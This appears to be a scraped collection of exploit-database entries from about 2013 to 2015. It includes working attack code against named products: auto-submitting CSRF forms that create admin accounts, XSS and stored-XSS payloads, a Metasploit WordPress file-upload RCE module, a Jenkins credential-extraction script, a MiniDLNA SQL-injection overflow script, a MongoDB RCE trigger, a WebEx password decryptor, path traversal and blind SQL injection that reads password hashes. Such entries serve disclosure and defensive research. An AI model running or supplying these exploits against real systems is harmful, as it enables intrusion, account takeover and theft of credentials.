HireHackking

source: https://www.securityfocus.com/bid/61156/info Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected. http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN

source: https://www.securityfocus.com/bid/61158/info PrestaShop is prone to multiple cross-site request-forgery vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible. PrestaShop 1.5.4 is vulnerable; other versions may also be affected. <html> <head> <body> <img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0> </body> </head> </html>

<!-- # Exploit Title: Unauthenticated Stored Xss # Date: 11/6/15 # Exploit Author: Nu11By73 # Vendor Homepage: comcast.net and arrisi.com # Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT Software Image Name:TG1682_2.0s7_PRODse Advanced Services:TG1682G Packet Cable:2.0 # Tested on: Default Install --> <html> <p>Unauth Stored CSRF/XSS - Xfinity Modem</p> <form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php"> <input type="hidden" name="set" value="true" /> <input type="hidden" name="UMSStatus" value="Enabled" /> <input type="hidden" name="add" value="true" /> <input type="hidden" name="service" value="test><script>alert(1)</script>" / > <input type="hidden" name="protocol" value="TCP" / > <input type="hidden" name="startPort" value="1" /> <input type="hidden" name="endPort" value="2" /> <input type="hidden" name="block" value="true" /> <input type="submit" title="Enable Service" /> </form> </html>

Information ================================= Name: CSRF Vulnerability in TestLink 1.9.14 Affected Software: TestLink Affected Versions: 1.9.14 and possibly below Vendor Homepage: http://testlink.org/ Severity: High Status: Fixed Vulnerability Type: ================================= Cross Site Request Forgery (CSRF) CVE Reference: ================================= Not assigned Technical Details: ================================= Even though the use of CSRF tokens are being implemented in the application, they aren't properly validated at the server side. This allows malicious requests to be generated by the attacker and get them processed by the server on behalf of the victim. By exploiting the vulnerability, the attacker will be able to create user accounts with administrator privileges on the application. Exploit Code ================================= <html lang="en"> <head> <title>CSRF Exploit to Create New Administrator Account</title> </head> <body> <form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php" id="formid" method="post"> <input type="hidden" name="CSRFName" value="" /> <input type="hidden" name="CSRFToken" value="" /> <input type="hidden" name="user_id" value="" /> <input type="hidden" name="user_login" value="" /> <input type="hidden" name="login" value="new_admin" /> <input type="hidden" name="firstName" value="new_administrator_fname" /> <input type="hidden" name="lastName" value="new_administrator_lname" /> <input type="hidden" name="password" value="new_administrator_password" /> <input type="hidden" name="emailAddress" value="new_administrator@admin.com" /> <input type="hidden" name="rights_id" value="8" /> <input type="hidden" name="locale" value="en_GB" /> <input type="hidden" name="authentication" value="" /> <input type="hidden" name="user_is_active" value="on" /> <input type="hidden" name="doAction" value="doCreate" /> <input type="hidden" name="do_update" value="Save" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> Exploitation Technique: =================================== Remote Severity Level: =================================== High Advisory Timeline =================================== Sat, 7 Nov 2015 13:14:33 +0530 - First Contact Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure Solution ==================================== This vulnerability is fixed in TestLink 1.9.15 (Tauriel) Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487 Credits & Authors ==================================== Aravind C Ajayan, Balagopal N

''' ******************************************************************************************** # Exploit Title: POP Peeper SEH Over-write. # Date: 9/14/2015 # Exploit Author: Un_N0n # Software Link: http://www.esumsoft.com/download # Version: v4.0.1 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [DUMP:] ''' EAX 00000000 ECX 20203029 EDX 77C5660D ntdll.77C5660D EBX 00000000 ESP 0012EC5C EBP 0012EC7C ESI 00000000 EDI 00000000 EIP 20203029 ============================== STACK: 0012FBF4 41414141 0012FBF8 41414141 0012FBFC 41414141 0012FC00 41414141 0012FC04 41414141 0012FC08 909020EB Pointer to next SE> 0012FC0C 20203029 SE handler 0012FC10 43434343 0012FC14 43434343 0012FC18 43434343 0012FC1C 43434343 0012FC20 43434343 0012FC24 43434343 0012FC28 43434343 =============================== ''' [Steps to Produce the Crash]: 1- Open 'POPPeeper.exe' 2- Goto Accounts->Add->CreateSingleAccount. 3- After entering the email address, the option for Account name will appear, enter the contents of crash.txt in it->Save. 4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt 5- Save as Draft, software will crash. 6- Open up "POPPeeper.exe" again. 7- Click on Check Mail option, Software will crash. Everytime you click on Check mail, it will crash as it will load the saved DRAFT. [Code to produce CRASH.txt] ''' buffer = "A"*66666 file = "crash.txt" f = open(file,'w') f.write(buffer) f.close() ''' [Extra Info:] Offset : 2052 ********************************************************************************************** '''

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows to upload arbitrary php files and get remote code execution. This module has been tested successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server. }, 'Author' => [ 'Unknown', # Identify yourself || send an PR here 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '8209'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Ajax Load More 2.8.1.1', {}]], 'DisclosureDate' => 'Oct 10 2015', 'DefaultTarget' => 0 )) register_options( [ OptString.new('WP_USERNAME', [true, 'A valid username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class ) end def check check_plugin_version_from_readme('ajax-load-more', '2.8.1.2') end def username datastore['WP_USERNAME'] end def password datastore['WP_PASSWORD'] end def get_nonce(cookie) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 'vars_get' => { 'page' => 'ajax-load-more-repeaters' }, 'cookie' => cookie ) if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/ return Regexp.last_match[1] else return nil end end def exploit vprint_status("#{peer} - Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? vprint_status("#{peer} - Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? vprint_status("#{peer} - Trying to upload payload") # This must be default.php filename = 'default.php' print_status("#{peer} - Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), 'vars_post' => { 'action' => 'alm_save_repeater', 'value' => payload.encoded, 'repeater' => 'default', 'type' => 'default', 'alias' => '', 'nonce' => nonce }, 'cookie' => cookie ) if res if res.code == 200 && res.body.include?('Template Saved Successfully') register_files_for_cleanup(filename) else fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) end end

source: https://www.securityfocus.com/bid/61196/info Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible. Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable. http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/ http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23

# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems # Date: 10.11.2015 # Exploit Author: Murat Sahin (@murtshn) # Vendor Homepage: Huawei # Version: HG630a and HG630a-50 # Tested on: linux,windows Adsl modems force you to change admin web interface password. Even though you can change admin password on the web interface, the password you assign does not apply to ssh. So, SSH password always will be 'Username:admin Password:admin'. Ex: *ssh admin@modemIP <admin@192.168.1.1>* admin@modemIP <admin@192.168.1.1>'s password:*admin* PTY allocation request failed on channel 0 ------------------------------ - -----Welcome to ATP Cli------ ------------------------------- ATP>? ? cls debug help save ? exit ATP>shell shell BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # cat /proc/version cat /proc/version Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013 #

# Exploit Title: YESWIKI 0.2 - Path Traversal (template param) # Date: 2015-11-10 # Exploit Author: HaHwul # Exploit Author Blog: http://www.codeblack.net # Vendor Homepage: http://yeswiki.net # Software Link: https://github.com/YesWiki/yeswiki # Version: yeswiki 0.2 # Tested on: Debian [Wheezy] , Ubuntu # CVE : none # =========================================== <!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd --><br> # Exploit Code<br> # =========================================== <br><br> <form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET"> <input type="hidden" name="wiki" value="HomePage/diaporama"> Target: Edit HTML Code<br> File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br> <input type="submit" value="Exploit"> </form> <!-- Auto Sumbit <script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script> -->

# Exploit Title: Jenkins Unauthenticated Credential Recovery # Disclosure Date: 10/14/2015 # Response Date: 10/14/2015 # Response: "Recommend this be rejected as a vulnerability." # Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html # Vendor Homepage: https://jenkins-ci.org/ # Tested on: Jenkins v1.633 # Author = 'Th3R3p0' | Justin Massey # Google Dork: intitle:"Dashboard [Jenkins]" Credentials import requests import re from BeautifulSoup import BeautifulSoup import urllib # Usage: Modify the URL below to match the target host and port # Must have trailing slash at end of URL url='http://192.168.1.151:8080/' # makes request to gather all users with stored credentials r= requests.get(url + 'credential-store/domain/_/') soup = BeautifulSoup(r.text) # loop to go through all hrefs and match the regex "credential" and add the urls to the users list users = [] for link in soup.body.findAll('a', href=True): m = re.match("credential", link['href']) if m: if link['href'] not in users: users.append(link['href']) for users in users: r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update') soup2 = BeautifulSoup(r2.text) # Finds the user and password value in html and stores in encPass variable user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value'] encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value'] # Encodes the password to www-form-urlencoded standards needed for the expected content type encPassEncoded = urllib.quote(encPass, safe='') # Script to run in groovy scripting engine to decrypt the password script = 'script=hudson.util.Secret.decrypt+%%27' \ '%s'\ '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \ '%s' \ '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded) # Using sessions because the POST requires a session token to be present with requests.Session() as s: r3 = s.get(url+'script') headers = {'content-type': 'application/x-www-form-urlencoded'} r3 = s.post(url+'script',data=script, headers=headers) soup3 = BeautifulSoup(r3.text) # Extracts password from body password = soup3.body.findAll('pre')[1].text password = re.sub('Result:', '', password) print "User: %s | Password:%s" % (user, password)

Source: https://code.google.com/p/google-security-research/issues/detail?id=614 The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer: $ ftbench <file> Attached are three POC files which trigger the conditions. --- $ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b' ------------------------------------------------------------------------------------- family: (null) style: (null) number of seconds for each test: 2.000000 starting glyph index: 0 face size: 10ppem font preloading into memory: no load flags: 0x0 render mode: 0 CFF engine set to Adobe TrueType engine set to version 35 maximum cache size: 1024KiByte executing tests: Load ================================================================= ==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608 READ of size 1 at 0x60200000eb55 thread T0 #0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19 #1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15 #2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12 #3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15 #4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15 #5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12 #6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19 #7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13 #8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15 #9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13 #10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15 #11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13 #12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15 #13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9 0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55) allocated by thread T0 here: #0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 #1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12 #2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15 #3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12 #4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13 #5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10 #6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12 #7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15 #8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15 #9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12 #10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19 #11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13 #12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15 #13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13 #14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15 #15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13 #16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15 #17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9 SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned Shadow bytes around the buggy address: 0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa 0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa 0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==22366==ABORTING --- The issue was reported in https://savannah.nongnu.org/bugs/?46379. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip

source: https://www.securityfocus.com/bid/61282/info ReadyMedia is prone to a remote heap-based buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. ReadyMedia prior to 1.1.0 are vulnerable. #!/usr/bin/env python #AAAAinject.py # Author: Zachary Cutlip # zcutlip@tacnetsol.com # twitter: @zcutlip #This script injects a buffer overflow into the ALBUM_ART table of #MiniDLNA's SQLite database. When queried with the proper soap request, #this buffer overflow demonstrates arbitrary code execution by placing a #string of user-controlled 'A's in the CPU's program counter. This #affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3. import math import sys import urllib,socket,os,httplib import time from overflow_data import DlnaOverflowBuilder headers={"Host":"10.10.10.1"} host="10.10.10.1" COUNT=8 LEN=128 empty='' overflow_strings=[] overflow_strings.append("AA") overflow_strings.append("A"*LEN) overflow_strings.append("B"*LEN) overflow_strings.append("C"*LEN) overflow_strings.append("D"*LEN) overflow_strings.append("A"*LEN) overflow_strings.append("\x10\x21\x76\x15"*(LEN/4)) overflow_strings.append("\x10\x21\x76\x15"*(LEN/4)) overflow_strings.append("D"*LEN) overflow_strings.append("D"*LEN) overflow_strings.append("D"*LEN) path_beginning='/AlbumArt/1;' path_ending='-18.jpg' details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\ ',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\ ',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\ ',"PWNED","1","PWNED");' objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\ '/**/VALUES("PWNED","PWNED","container","31337");' details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";' objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";' def build_injection_req(query): request=path_beginning+query+path_ending return request def do_get_request(request): conn=httplib.HTTPConnection(host,8200) conn.request("GET",request,"",headers) conn.close() def build_update_query(string): details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\ '||"'+string+'"/**/where/**/ID="31337";' return details_update_query def clear_overflow_data(): print "Deleting existing overflow data..." request=build_injection_req(details_delete_query) do_get_request(request) request=build_injection_req(objects_delete_query) do_get_request(request) time.sleep(1) def insert_overflow_data(): print("Setting up initial database records....") request=build_injection_req(objects_insert_query) do_get_request(request) request=build_injection_req(details_insert_query) do_get_request(request) print("Building long ALBUM_ART string.") for string in overflow_strings: req=build_injection_req(build_update_query(string)) do_get_request(req) clear_overflow_data() insert_overflow_data()

source: https://www.securityfocus.com/bid/61309/info MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application. MongoDB 2.4.4 is vulnerable; other versions may also be affected. use databaseMapped sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) } db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');

source: https://www.securityfocus.com/bid/61356/info YardRadius is prone to multiple local format-string vulnerabilities. Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible. YardRadius 1.1.2-4 is vulnerable; other versions may also be possible. The following proof-of-concept is available: ln -s radiusd %x ./%x -v

// source: https://www.securityfocus.com/bid/61304/info Cisco WebEx One-Click Client is prone to an information disclosure vulnerability. Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks. /* WebEx One-Click Registry Key Decryptor brad.antoniewicz@foundstone.coma compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography for making life easy see comments below */ #include <openssl/aes.h> #include <string.h> #include <stdlib.h> #include <stdio.h> unsigned char * aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv) { unsigned char * outbuf = calloc(1,length); int num = 0; unsigned char liv[16]; memcpy(liv,iv,16); AES_KEY aeskey; //memset(outbuf, 0, 8); AES_set_encrypt_key(key, 256, &aeskey); AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num); return outbuf; } unsigned char * aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv) { unsigned char * outbuf= calloc(1,length); int num = 0; unsigned char liv[16]; memcpy(liv,iv,16); AES_KEY aeskey; AES_set_encrypt_key(key, 256, &aeskey); AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num); return outbuf; } void main() { /* This value is from HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password */ unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f"; /* This value is from HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen */ int regLength = 12; /* This value is a combination of these two registry keys: HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName Basicaly the username and the sitename padding to 32 characters, if the two dont add up to 32 characters, its just repeated until it fits */ unsigned char key[32] = "braantonsiteaa.webex.com/siteaab"; /* The IV is static, particularly complex value of 123456789abcdef.... */ unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 }; /* These are just for testing, you'd probably not have the password :) */ unsigned char * password = "bradbradbrad"; int pwLength = strlen((char *)password); unsigned char * enc = NULL; unsigned char * enc2 = NULL; int i = 0; printf("Reg Key Value = "); enc = aes_ofb_encrypt(password, pwLength, key, iv); for(i=0;i<pwLength;i++) { printf("%02x ", enc[i]); } printf("\n"); printf("Password = "); enc2 = aes_ofb_decrypt(regVal, regLength, key, iv); for(i=0;i<regLength;i++) { printf("%c", enc2[i]); } printf("\n"); }

source: https://www.securityfocus.com/bid/61353/info Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected. http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#

source: https://www.securityfocus.com/bid/61384/info Collabtive is prone to multiple cross-site scripting vulnerabilities, an arbitrary file upload vulnerability, and a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to bypass certain security restrictions, upload and execute arbitrary script code in the context of the affected web server process. This may let attackers steal cookie-based authentication credentials, perform unauthorized actions, or compromise the application; other attacks are possible. Collabtive 1.0 is vulnerable; other versions may also be affected. File upload: https://www.example.com/secprj/files/standard/avatar/uploadedshell_104185.php Cross-site scripting: https://www.example.com/secprj/managechat.php?userto=<SCRIPT/XSS SRC="http://www.example1.com/xss.js";></SCRIPT>&uid=2 "><SCRIPT/XSS SRC="http://www.example1.com/xss.js";></SCRIPT> Security-bypass: https://www.example.com/secprj/manageuser.php?action=del&id=5

source: https://www.securityfocus.com/bid/61401/info The FlagEm plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]

source: https://www.securityfocus.com/bid/61449/info VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. VBulletin 4.0.x are vulnerable. The exploit is caused due to a variable named 'update_order' not being sanitized before being used within an insert into statement. if ($_REQUEST['do'] == 'update_order') { $vbulletin->input->clean_array_gpc('r', array( 'force_read_order' => TYPE_ARRAY )); if ($vbulletin->GPC['force_read_order']) { foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order) { $db->query_write(" UPDATE " . TABLE_PREFIX . "thread AS thread SET force_read_order = '$order' WHERE threadid = '$threadid' "); } } POC You will need Admincp Access then go to site.com/admincp/force_read_thread.php then in the force read order colum put a ' into one of them to show this Database error in vBulletin 4.2.1: Invalid SQL: UPDATE thread AS thread SET force_read_order = '1'' WHERE threadid = '5161'; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5161'' at line 2 Error Number : 1064 Request Date : Thursday, July 25th 2013 @ 01:20:52 AM Error Date : Thursday, July 25th 2013 @ 01:20:52 AM Script : http://www.example.com/admincp/force_read_thread.php?do=update_order Referrer : http://www.example.com/admincp/force_read_thread.php IP Address : Username : n3tw0rk Classname : MySQL Version :

source: https://www.securityfocus.com/bid/61423/info Magnolia CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable. <form action="http://www.example.com/magnoliaPublic/demo-project/members-area/registration.html" method="post" name="main"> <input type="hidden" name="mgnlModelExecutionUUID" value="8417fe0e-8f61-4d21-bdf1-c9c23b13ba14"> <input type="hidden" name="password" value='password'> <input type="hidden" name="passwordConfirmation" value='password'> <input type="hidden" name="username" value='"><script>alert(document.cookie);</script>'> <input type="hidden" name="fullName" value='"><script>alert(document.cookie);</script>'> <input type="hidden" name="email" value='"><script>alert(document.cookie);</script>'> <input type="submit" id="btn"> </form> <script> document.main.submit(); </script>

source: https://www.securityfocus.com/bid/61425/info The Duplicator plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Duplicator 0.4.4 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection # Date: 11-11-2015 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description For this vulnerabilities also WP-Polls needs to be installed. Everyone can access wpfc_wppolls_ajax_request(). $_POST["poll_id"] is not escaped properly. File: wp-fastest-cache\inc\wp-polls.php public function wpfc_wppolls_ajax_request() { $id = strip_tags($_POST["poll_id"]); $id = mysql_real_escape_string($id); $result = check_voted($id); if($result){ echo "true"; }else{ echo "false"; } die(); } http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html 2. Proof of Concept <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request"> <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- "> <input type="submit" value="Send"> </form> 3. Solution: Update to version 0.8.4.9

